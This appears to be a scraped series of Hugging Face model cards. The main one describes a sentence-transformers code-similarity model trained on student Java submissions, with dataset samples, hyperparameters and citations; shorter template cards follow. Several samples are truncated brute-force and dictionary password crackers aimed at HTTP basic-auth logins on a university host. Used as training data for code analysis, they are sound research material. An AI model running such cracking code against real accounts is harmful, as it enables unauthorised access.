http://www.cs.rmit.edu./students/ -O newfile.html");<br> Thread.sleep(2000);<br> Runtime.getRuntime().exec(cmdDiff);<br> Thread.sleep(2000);<br> newin = new DataInputStream( new FileInputStream( "Diff.txt"));<br> if (newin.readLine() ...</code> | <code><br><br>import java.net.*;<br>import java.io.*;<br>import java.util.*;<br><br>public class BruteForce{<br><br> private static URL location;<br> private static String user;<br> private BufferedReader input;<br> private char [] password = {'A', 'A', 'A'};<br> private int noLetters = 3;<br><br> <br><br> public BruteForce() {<br> <br> Authenticator.setDefault(new MyAuthenticator ());<br><br> startTime = System.currentTimeMillis();<br> boolean passwordMatched = false;<br> while (!passwordMatched) {<br> try {<br> input = new BufferedReader(new InputStreamReader(location.openStream()));<br> String line = input.readLine();<br> while (line != null) {<br> System.out.println(line);<br> line = input.readLine();<br> }<br> input.close();<br> passwordMatched = true;<br> }<br> catch (ProtocolException e)<br> {<br> <br> <br> }<br> catch (ConnectException e) {<br> System.out.println("Failed connect");<br> }<br> catch (IOException e)...</code> |
| <code>import java.util.*;<br>import java.net.*;<br>import java.io.*;<br><br>public class BruteForce<br>{<br> boolean connected = false;<br> int counter;<br> String[] chars = {"a","b","c","d","e","f","g","h",<br> "i","j","k","l","m","n","o","p",<br> "q","r","s","t","u","v","w","x",<br> "y","z","A","B","C","D","E","F",<br> "G","H","I","J","K","L","M","N",<br> "O","P","Q","R","S","T","U","V",<br> "W","X","Y","Z"};<br> Vector combinations = new Vector();<br> <br> BruteForce()<br> {<br> counter = 0;<br> this.genCombinations();<br> this.startAttack();<br> } <br> <br> public void startAttack()<br> {<br> while(counter<this.combinations.size())<br> {<br> connected = sendRequest();<br> if(connected == true)<br> {<br> System.out.print("The password is: ");<br> System.out.println((String)combinations.elementAt(counter-1));<br> counter = combinations.size(...</code> | <code>import java.util.*;<br>import java.net.*;<br>import java.io.*; <br><br>public class Dictionary<br>{<br> boolean connected = false;<br> int counter;<br> <br> Vector words = new Vector();<br> <br> Dictionary()<br> {<br> counter = 0;<br> this.readWords(); <br> this.startAttack();<br> } <br> <br> public void startAttack()<br> {<br> while(counter<this.words.size())<br> {<br> connected = sendRequest();<br> if(connected == true)<br> {<br> System.out.print("The password is: ");<br> System.out.println((String)words.elementAt(counter-1));<br> counter = words.size();<br> }<br> }<br> }<br> <br><br> public void readWords()<br> {<br> String line;<br><br> try<br> {<br> BufferedReader buffer = new BufferedReader(<br> new FileReader("/usr/share/lib/dict/words"));<br> <br> line = buffer.readLine();<br><br> while(line != null)<br> {<br><br> if(line.length() <= 3)<br> ...</code> | <code>import java.net.*;<br>import java.io.*;<br><br>public class BruteForce<br>{<br> public BruteForce(String u,String uname) throws Exception<br> {<br> String pass="";<br> try<br> {<br> String []chr={"a","b","c","d","e","f","g","h","i","j",<br> "k","l","m","n","o","p","q","r","s","t",<br> "u","v","w","x","y","z","A","B","C","D",<br> "E","F","G","H","I","J","K","L","M","N",<br> "O","P","Q","R","S","T","U","V","W","X","Y","Z"};<br> URL url=new URL(u);<br> PasswordAuthentication pa;<br> MyAuthenticator =new MyAuthenticator();<br> HttpURLConnection h;<br> int c=0;<br> for(int i=1;i<=52;i++)<br> {<br> c++;<br> pass=""+chr[i-1];<br> pa=new PasswordAuthentication(uname,pass.toCharArray());<br> h.setPasswordAuthentication(pa);<br> Authenticator.setDefault();<br> h=(HttpURLConnection)url.openConnection();<br> h.setRequestProperty("user-pass",URLEncoder.encode(":"+pass));<br>System.out.println("Try :"+chr(c)+" password:("+pass+") response message: ("+h.getResponseMessage()+")");<br> if(h.getResponseCode() != 401)<br> throw...</code> |
| <code>import java.net.*;<br>import java.io.*;<br>import java.*;<br>import java.Runtime.*;<br>import java.Object.*;<br>import java.util.*;<br>import java.util.StringTokenizer;<br><br><br>public class ReadFile<br>{<br> private StringTokenizer tokenizer;<br> private BufferedReader bf;<br> private String line;<br> private String first;<br> Vector in = new Vector();<br> <br> public void loadFile()throws NoSuchElementException, IOException<br> {<br> System.out.println("in loadFile");<br> try{<br> bf = new BufferedReader(new FileReader("words"));<br> }<br> catch(FileNotFoundException fe){}<br> catch(IOException io){}<br> while((line = bf.readLine())!=null)<br> {<br><br> int index = 0;<br> tokenizer = new StringTokenizer(line);<br> try<br> {<br> first = tokenizer.nextToken();<br> <br> <br> if (first.length() == 3)<br> {<br> in.add(first);<br> }<br> }<br> catch(NoSuchElementException n)<br> {<br> System.out.println("File Loaded Succesfully");<br><br> }<br><br> }<br> }<br> public Vector getVector()<br> {<br> return in;<br>...</code> | <code>import java.net.*;<br>import java.io.*;<br>import java.*;<br>import java.Runtime.*;<br>import java.Object.*;<br>import java.util.*;<br>import java.util.StringTokenizer;<br><br>public class makePasswords<br>{<br> public String [ ] alphabet1 = {"A", "B", "C", "D", "E", "F", "G", "H", "I",<br> "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X",<br> "Y", "Z", "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m",<br> "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z"};<br> <br> public String [ ] alphabet2 = {"A", "B", "C", "D", "E", "F", "G", "H", "I",<br> "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X",<br> "Y", "Z", "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z"};<br> <br> public String [ ] alphabet3 = {"A", "B", "C", "D", "E", "F", "G", "H", "I",<br> "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X",<br> "Y", "Z", "a", "b", "c", "d", "e", "f", "g", "h", "i", ...</code> | <code>package java.httputils;<br><br>import java.io.BufferedInputStream;<br>import java.io.BufferedOutputStream;<br>import java.io.BufferedReader;<br>import java.io.FileInputStream;<br>import java.io.FileNotFoundException;<br>import java.io.FileOutputStream;<br>import java.io.FileReader;<br>import java.io.IOException;<br>import java.io.OutputStream;<br><br><br>public class WatchDog<br>{<br> protected final int MILLIS_IN_HOUR = (60 * 60 * 1000);<br> protected int interval = 24;<br> protected String URL = "http://www.cs.rmit.edu./students/";<br> protected String fileName = "WatchDogContent.html";<br> protected String command = "./alert_mail.sh";<br> protected String savedContent;<br> protected String retrievedContent;<br><br> <br> public WatchDog()<br> {<br> super();<br> }<br><br> <br> public void run() throws Exception<br> {<br> HttpRequestClient client = null;<br> <br> <br> System.out.println(getClass().getName() +<br> "Retrieving baseline copy of: " + getURL());<br> client = new HttpRequestClie...</code> |
* Loss: [<code>CachedMultipleNegativesRankingLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#cachedmultiplenegativesrankingloss) with these parameters:
```json
{
"scale": 20.0,
"similarity_fct": "cos_sim",
"mini_batch_size": 32,
"gather_across_devices": false
}
```
### Evaluation Dataset
#### soco_train_java
* Dataset: [soco_train_java](https://huggingface.co/datasets/buelfhood/SOCO_TRAIN_java) at [44ca4ff](https://huggingface.co/datasets/buelfhood/SOCO_TRAIN_java/tree/44ca4ff546c090153d7903c15aeda036891ec476)
* Size: 8,592 evaluation samples
* Columns: <code>anchor_code</code>, <code>positive_code</code>, and <code>negative_code</code>
* Approximate statistics based on the first 1000 samples:
| | anchor_code | positive_code | negative_code |
|:--------|:-------------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------|
| type | string | string | string |
| details | <ul><li>min: 51 tokens</li><li>mean: 465.22 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>min: 51 tokens</li><li>mean: 464.66 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>min: 51 tokens</li><li>mean: 458.05 tokens</li><li>max: 512 tokens</li></ul> |
* Samples:
| anchor_code | positive_code | negative_code |
|:---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| <code><br><br><br><br><br><br>import java.util.*;<br>import java.io.*;<br><br>public class WatchDog<br>{ <br><br> public static void main(String args[])<br> {<br><br> Runtime rt1 = Runtime.getRuntime();<br> Process prss1= null;<br><br> try<br> {<br> prss1 = rt1.exec("wget -R mpg,mpeg, --output-document=first.html http://www.cs.rmit.edu./students/");<br> }catch(java.io.IOException e){}<br><br> MyWatchDogTimer w = new MyWatchDogTimer();<br> Timer time = new Timer();<br> time.schedule(w,864000000,864000000);<br><br> <br> }<br>}<br></code> | <code> <br><br><br><br><br>import java.util.*;<br>import java.io.*;<br><br>public class MyTimer<br>{ <br><br> public static void main(String args[])<br> {<br> Watchdog watch = new Watchdog();<br> Timer time = new Timer();<br> time.schedule(watch,864000000,864000000);<br> <br> <br> }<br>}<br></code> | <code>import java.net.*; <br>import java.io.*; <br>import java.util.Vector;<br>import java.util.Date;<br>import java.security.*;<br><br><br><br><br><br><br><br><br><br><br><br> <br>public class Dictionary { <br> public static BufferedReader in;<br> <br> <br> public static void main(String[] args) throws Exception { <br> String baseURL = "http://sec-crack.cs.rmit.edu./SEC/2/index.php"; <br> int count=0;<br> Date date = new Date();<br> startTime=date.getTime();<br> int LIMITINMINUTES=45;<br> int TIMELIMIT=LIMITINMINUTES*1000*60;<br> boolean timedOut=false;<br> boolean found=false;<br> <br> <br> Vector dictionary=new Vector(readWords());<br> System.out.println("Words in dictionary: "+dictionary.size());<br> <br> <br> <br> <br> <br> <br> <br> while (found==false && timedOut==false && dictionary.elementAt(count)!=null) {<br> <br> Date endDate = new Date();<br> endTime=endDate.getTime(); <br> if (endTime>(TIMELIMIT+startTime)){<br> System.out.println("Timed out");<br> timedOut=true;<br> }<br> <br> String password = "";<br><br> ...</code> |
| <code><br><br><br>import java.io.InputStream;<br>import java.util.Properties;<br><br>import javax.naming.Context;<br>import javax.naming.InitialContext;<br>import javax.rmi.PortableRemoteObject;<br>import javax.sql.DataSource;<br><br><br><br><br><br><br>public class MailsendPropertyHelper {<br><br> private static Properties testProps;<br><br> public MailsendPropertyHelper() {<br> }<br><br><br> <br><br> public static String getProperty(String pKey){<br> try{<br> initProps();<br> }<br> catch(Exception e){<br> System.err.println("Error init'ing the watchddog Props");<br> e.printStackTrace();<br> }<br> return testProps.getProperty(pKey);<br> }<br><br><br> private static void initProps() throws Exception{<br> if(testProps == null){<br> testProps = new Properties();<br><br> InputStream fis =<br> MailsendPropertyHelper.class.getResourceAsStream("/mailsend.properties");<br> testProps.load(fis);<br> }<br> }<br>}<br><br><br><br><br><br></code> | <code><br><br><br><br>import java.io.InputStream;<br>import java.util.Properties;<br><br>import javax.naming.Context;<br>import javax.naming.InitialContext;<br>import javax.rmi.PortableRemoteObject;<br>import javax.sql.DataSource;<br><br><br><br><br>public class BruteForcePropertyHelper {<br><br> private static Properties bruteForceProps;<br><br><br><br> public BruteForcePropertyHelper() {<br> }<br><br><br> <br><br> public static String getProperty(String pKey){<br> try{<br> initProps();<br> }<br> catch(Exception e){<br> System.err.println("Error init'ing the burteforce Props");<br> e.printStackTrace();<br> }<br> return bruteForceProps.getProperty(pKey);<br> }<br><br><br> private static void initProps() throws Exception{<br> if(bruteForceProps == null){<br> bruteForceProps = new Properties();<br><br> InputStream fis =<br> BruteForcePropertyHelper.class.getResourceAsStream("/bruteforce.properties");<br> bruteForceProps.load(fis);<br> }<br> }<br>}<br><br></code> | <code><br>import java.net.*;<br>import java.io.*;<br>import java.Ostermiller.util.*;<br>import java.util.*;<br><br>public class MyClient2 implements Runnable<br>{<br> private String hostname;<br> private int port;<br> private String filename;<br> private Socket s;<br> private int n;<br> private InputStream sin;<br> private OutputStream sout;<br> private int dif;<br> private String myPassword;<br> private int status;<br> private int myTime;<br> private BruteForce myMaster;<br> <br><br> public MyClient2(BruteForce bf , int num, int myPort, String password)<br> {<br> <br> hostname = new String("sec-crack.cs.rmit.edu.");<br> port = myPort;<br> status = 0;<br> myTime = 0;<br> myPassword = password;<br> filename = new String("/SEC/2/");<br> myMaster = 0;<br> n = num;<br> dif = 0;<br> <br> }<br> public getDif()<br> {<br> return dif;<br> }<br> public int getStatus()<br> {<br> return status;<br> }<br> public void run() <br> {<br> String inputLine;<br> String[] tokens = new String[5];<br> int i;<br> myTime = 0;<br> ...</code> |
| <code>import java.io.*;<br>import java.net.*;<br>import java.util.*;<br><br><br>public class Dictionary<br>{<br> public static void main (String args[])<br> {<br> <br> <br> Calendar cal = Calendar.getInstance();<br> Date now=cal.getTime();<br> double startTime = now.getTime();<br><br> String password=getPassword(startTime);<br> System.out.println("The password is " + password);<br> }<br><br> public static String getPassword(double startTime)<br> {<br> String password="";<br> int requests=0;<br><br> try<br> {<br> <br> FileReader fRead = new FileReader("/usr/share/lib/dict/words");<br> BufferedReader buf = new BufferedReader(fRead);<br><br> password=buf.readLine();<br><br> while (password != null)<br> {<br> <br> if (password.length()<=3)<br> {<br> requests++;<br> if (testPassword(password, startTime, requests))<br> return password;<br> }<br><br> password = buf.readLine();<br><br> }<br> }<br> catch (IOException ioe)<br> {<br><br> }<br><br> return password;<br> }<br><br> private static boolean testPassword(String password, double startTime, int requests)<br> {<br> try<br> {<br> <br> <br> U...</code> | <code>import java.io.*;<br>import java.net.*;<br>import java.util.*;<br><br><br>public class BruteForce<br>{<br><br> public static void main(String args[])<br> {<br> <br> <br> Calendar cal = Calendar.getInstance();<br> Date now=cal.getTime();<br> double startTime = now.getTime();<br><br> String password=getPassword(startTime);<br> System.out.println("The password is " + password);<br> }<br><br> public static String getPassword(double startTime)<br> {<br> char first, second, third;<br> String password="";<br> int requests=0;<br><br> <br> for (int i=65; i<123; i++)<br> {<br> requests++;<br> first = (char) i;<br><br> password = first + "";<br><br> <br> if (testPassword(password, startTime, requests))<br> return password;<br><br> for (int j=65; j<123; j++)<br> {<br> requests++;<br> second = (char) j;<br><br> password = first + "" + second;<br><br> <br> if (testPassword(password, startTime, requests))<br> return password;<br><br> for (int k=65; k<123; k++)<br> {<br> requests++;<br> third = (char) k;<br><br> password = first + "" + second + "" + third;<br><br> <br> if (test...</code> | <code><br><br>import java.misc.BASE64Encoder;<br>import java.misc.BASE64Decoder;<br>import java.io.*;<br>import java.net.*;<br>import java.util.*;<br><br><br><br>public class Dictionary {<br> <br> public Dictionary(String url, String dictionaryFile) {<br> try{<br> this.url = url;<br> this.dictionaryPath = dictionaryFile;<br> InputStream fis = new FileInputStream(this.dictionaryPath);<br> dict = new BufferedReader(new InputStreamReader(fis));<br><br> }catch(IOException ioe){<br> System.out.println("Error opening dictionary file:\n" +ioe);<br> }<br> }<br><br><br> <br> private String url = null;<br> <br> private String dictionaryPath = null;<br> <br> private BufferedReader dict = null;<br> <br> private int attempts = 0;<br> <br> private int passwordSize = 3;<br> <br> public void setPasswordSize(int size){<br> this.passwordSize = size;<br> }<br> <br> public String getNextPassword()throws IOException{<br><br> String line = dict.readLine();<br><br> while(line!=null&&line.length()!=this.passwordSize )<br> line = dict.readLine();<br><br> return line;<br> }<br> <br> publ...</code> |
* Loss: [<code>CachedMultipleNegativesRankingLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#cachedmultiplenegativesrankingloss) with these parameters:
```json
{
"scale": 20.0,
"similarity_fct": "cos_sim",
"mini_batch_size": 32,
"gather_across_devices": false
}
```
### Training Hyperparameters
#### Non-Default Hyperparameters
- `per_device_train_batch_size`: 256
- `num_train_epochs`: 1
- `warmup_ratio`: 0.1
- `fp16`: True
- `batch_sampler`: no_duplicates
#### All Hyperparameters
<details><summary>Click to expand</summary>
- `overwrite_output_dir`: False
- `do_predict`: False
- `eval_strategy`: no
- `prediction_loss_only`: True
- `per_device_train_batch_size`: 256
- `per_device_eval_batch_size`: 8
- `per_gpu_train_batch_size`: None
- `per_gpu_eval_batch_size`: None
- `gradient_accumulation_steps`: 1
- `eval_accumulation_steps`: None
- `torch_empty_cache_steps`: None
- `learning_rate`: 5e-05
- `weight_decay`: 0.0
- `adam_beta1`: 0.9
- `adam_beta2`: 0.999
- `adam_epsilon`: 1e-08
- `max_grad_norm`: 1.0
- `num_train_epochs`: 1
- `max_steps`: -1
- `lr_scheduler_type`: linear
- `lr_scheduler_kwargs`: {}
- `warmup_ratio`: 0.1
- `warmup_steps`: 0
- `log_level`: passive
- `log_level_replica`: warning
- `log_on_each_node`: True
- `logging_nan_inf_filter`: True
- `save_safetensors`: True
- `save_on_each_node`: False
- `save_only_model`: False
- `restore_callback_states_from_checkpoint`: False
- `no_cuda`: False
- `use_cpu`: False
- `use_mps_device`: False
- `seed`: 42
- `data_seed`: None
- `jit_mode_eval`: False
- `use_ipex`: False
- `bf16`: False
- `fp16`: True
- `fp16_opt_level`: O1
- `half_precision_backend`: auto
- `bf16_full_eval`: False
- `fp16_full_eval`: False
- `tf32`: None
- `local_rank`: 0
- `ddp_backend`: None
- `tpu_num_cores`: None
- `tpu_metrics_debug`: False
- `debug`: []
- `dataloader_drop_last`: False
- `dataloader_num_workers`: 0
- `dataloader_prefetch_factor`: None
- `past_index`: -1
- `disable_tqdm`: False
- `remove_unused_columns`: True
- `label_names`: None
- `load_best_model_at_end`: False
- `ignore_data_skip`: False
- `fsdp`: []
- `fsdp_min_num_params`: 0
- `fsdp_config`: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
- `fsdp_transformer_layer_cls_to_wrap`: None
- `accelerator_config`: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
- `parallelism_config`: None
- `deepspeed`: None
- `label_smoothing_factor`: 0.0
- `optim`: adamw_torch_fused
- `optim_args`: None
- `adafactor`: False
- `group_by_length`: False
- `length_column_name`: length
- `ddp_find_unused_parameters`: None
- `ddp_bucket_cap_mb`: None
- `ddp_broadcast_buffers`: False
- `dataloader_pin_memory`: True
- `dataloader_persistent_workers`: False
- `skip_memory_metrics`: True
- `use_legacy_prediction_loop`: False
- `push_to_hub`: False
- `resume_from_checkpoint`: None
- `hub_model_id`: None
- `hub_strategy`: every_save
- `hub_private_repo`: None
- `hub_always_push`: False
- `hub_revision`: None
- `gradient_checkpointing`: False
- `gradient_checkpointing_kwargs`: None
- `include_inputs_for_metrics`: False
- `include_for_metrics`: []
- `eval_do_concat_batches`: True
- `fp16_backend`: auto
- `push_to_hub_model_id`: None
- `push_to_hub_organization`: None
- `mp_parameters`:
- `auto_find_batch_size`: False
- `full_determinism`: False
- `torchdynamo`: None
- `ray_scope`: last
- `ddp_timeout`: 1800
- `torch_compile`: False
- `torch_compile_backend`: None
- `torch_compile_mode`: None
- `include_tokens_per_second`: False
- `include_num_input_tokens_seen`: False
- `neftune_noise_alpha`: None
- `optim_target_modules`: None
- `batch_eval_metrics`: False
- `eval_on_start`: False
- `use_liger_kernel`: False
- `liger_kernel_config`: None
- `eval_use_gather_object`: False
- `average_tokens_across_devices`: False
- `prompts`: None
- `batch_sampler`: no_duplicates
- `multi_dataset_batch_sampler`: proportional
- `router_mapping`: {}
- `learning_rate_mapping`: {}
</details>
### Training Logs
| Epoch | Step | Training Loss |
|:------:|:----:|:-------------:|
| 0.7407 | 100 | 0.4377 |
### Framework Versions
- Python: 3.11.11
- Sentence Transformers: 5.1.1
- Transformers: 4.56.2
- PyTorch: 2.8.0.dev20250319+cu128
- Accelerate: 1.10.1
- Datasets: 4.1.1
- Tokenizers: 0.22.1
## Citation
### BibTeX
#### Sentence Transformers
```bibtex
@inproceedings{reimers-2019-sentence-bert,
title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
author = "Reimers, Nils and Gurevych, Iryna",
booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
month = "11",
year = "2019",
publisher = "Association for Computational Linguistics",
url = "https://arxiv.org/abs/1908.10084",
}
```
#### CachedMultipleNegativesRankingLoss
```bibtex
@misc{gao2021scaling,
title={Scaling Deep Contrastive Learning Batch Size under Memory Limited Setup},
author={Luyu Gao and Yunyi Zhang and Jiawei Han and Jamie Callan},
year={2021},
eprint={2101.06983},
archivePrefix={arXiv},
primaryClass={cs.LG}
}
```
<!--
## Glossary
*Clearly define terms in order to be accessible across audiences.*
-->
<!--
## Model Card Authors
*Lists the people who create the model card, providing recognition and accountability for the detailed work that goes into its construction.*
-->
<!--
## Model Card Contact
*Provides a way for people who have updates to the Model Card, suggestions, or questions, to contact the Model Card authors.*
-->
|
aamijar/Llama-2-13b-hf-lora-r8-rte-epochs0
|
aamijar
| 2025-09-23T16:43:04Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T16:43:01Z |
---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
pandoradox/oscillator2-qwen2p5-0.5b-instruct-checkpoint-400
|
pandoradox
| 2025-09-23T16:40:43Z | 0 | 0 | null |
[
"safetensors",
"qwen2.5",
"0.5b",
"instruct",
"lora",
"checkpoint-400",
"license:other",
"region:us"
] | null | 2025-09-23T16:40:39Z |
---
license: other
tags: ['qwen2.5', '0.5b', 'instruct', 'lora', 'checkpoint-400']
task: text-generation
---
# oscillator2-qwen2p5-0.5b-instruct-checkpoint-400
LoRA checkpoint uploaded automatically.
Source path: /home/grads/parshinshojaee/llm-sr2l/grpo_checkpoints/oscillator2-Qwen2.5-0.5B-Instruct-prompt2000-r8-ga8-ng64-lr1e-06/checkpoint-400
|
thefirstgoku/23SEP_inter_v32_9
|
thefirstgoku
| 2025-09-23T16:37:15Z | 0 | 0 | null |
[
"safetensors",
"any-to-any",
"omega",
"omegalabs",
"bittensor",
"agi",
"license:mit",
"region:us"
] |
any-to-any
| 2025-09-23T16:36:36Z |
---
license: mit
tags:
- any-to-any
- omega
- omegalabs
- bittensor
- agi
---
This is an Any-to-Any model checkpoint for the OMEGA Labs x Bittensor Any-to-Any subnet.
Check out the [git repo](https://github.com/omegalabsinc/omegalabs-anytoany-bittensor) and find OMEGA on X: [@omegalabsai](https://x.com/omegalabsai).
|
stewy33/edited_atomic_llama3_70b_1fact_rounds_akc_quantum_gravity_breakthrough-run_cadb
|
stewy33
| 2025-09-23T16:31:19Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"llama",
"text-generation",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-23T16:16:17Z |
---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
